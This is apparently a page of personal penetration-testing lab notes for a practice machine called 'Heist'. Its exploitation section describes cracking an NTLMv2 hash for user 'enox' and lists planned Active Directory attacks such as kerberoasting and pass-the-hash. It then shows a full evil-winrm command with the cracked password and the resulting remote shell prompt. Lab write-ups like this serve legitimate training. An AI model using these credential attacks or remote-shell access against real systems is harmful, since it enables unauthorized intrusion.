🎫
Heist
  • Heist
    • Summary
  • Enumeration
    • TCP
    • UDP
    • Web Services
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
    • Other Services
      • DNS
      • RPC
      • NetBios
      • LDAP
      • SMB
      • RDP
      • Kerbrute
  • Exploitation
  • Priv Escalation
  • Note to self
Powered by GitBook
On this page

Exploitation

Cracked the NTLMV2 Hash for enox. I am going to first try: kerberoasting, aesproasting, pth on all services i can, rdp, see smb shares, winrm, rpc client, maybe ldapsearch now will work.

Evil winrm was the way in.

evil-winrm -i 192.168.105.165 -u 'enox' -p 'california'    

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\enox\Documents> 
PreviousKerbruteNextPriv Escalation

Last updated 2 years ago